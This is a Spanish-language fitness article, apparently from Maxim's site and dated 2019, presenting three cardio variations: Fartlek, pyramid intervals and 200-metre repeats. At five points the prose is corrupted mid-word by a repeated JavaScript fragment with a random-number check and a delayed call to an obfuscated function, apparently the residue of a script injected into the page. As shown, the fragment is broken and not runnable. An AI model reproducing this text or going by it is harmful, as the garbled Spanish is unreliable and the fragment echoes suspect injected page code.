Formas distintas de hacer tu sesión de cardio

    Formas distintas de hacer tu sesión de cardio

    Te damos 3 formas para cambiar tu entrenamiento de todos los días.

    Autor: Michelle Prats 23 enero, 2019


    FOTO: UnSplash

    Correr para algunas personas puede ser tedioso pero agrega algunos de estos métodos a tu entrenamiento de vez en cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando y cambia la rutina de todos los días.

    Hacer intervalos de alta intensidad como en tus entrenamientos de fuerza también es posible en las sesiones de cardio. Una de sus grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes ventajas es que te ayudará a quemar calorías y mejorar tu capacidad pulmonar y velocidad.

    Un punto que no debes olvidar es el calentamiento y por supuesto el enfriamiento, así que trota unos diez a quince minutos antes de iniciar y al finalizar.

    El famoso Fartlek

    Hazlo con diferentes elevaciones de terreno, el máximo esfuerzo lo estarás haciendo en la subida y bajarás la velocidad cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando hagas el descenso. Realiza la subida explosiva esto trabajará perfectamente tu capacidad aeróbica. Lleva un control de tu ritmo cardiaco.

    Pirámide

    El objetivo principal es correr intercalandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando intervalos de intensidad con unos de recuperación a un ritmo de trote.

    Empieza corriendo 30 segundos al máximo, baja la velocidad y trota por 30 segundos. Lugo sube a 45 segundos de intensidad con un minuto de trote. Esta es una serie.

    Sigue intercalandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando hasta alcanzar de 3 a 5 series.

    200 metros a ritmo

    Si entrenas en una pista o en cualquier parque podrás notar que se divide por metros, esto es lo que harás: Corre 200 metros a velocidad y trota los siguientes 100 metros para recupérate, repite hasta realizar de 8-10 repeticiones.

    Entrena con tabatas, otro gran método para intercalar en tus sesiones.

    Ver más de Maxim

    Temas relacionados con esta nota: , , , ,

Te damos 3 formas para cambiar tu entrenamiento de todos los días.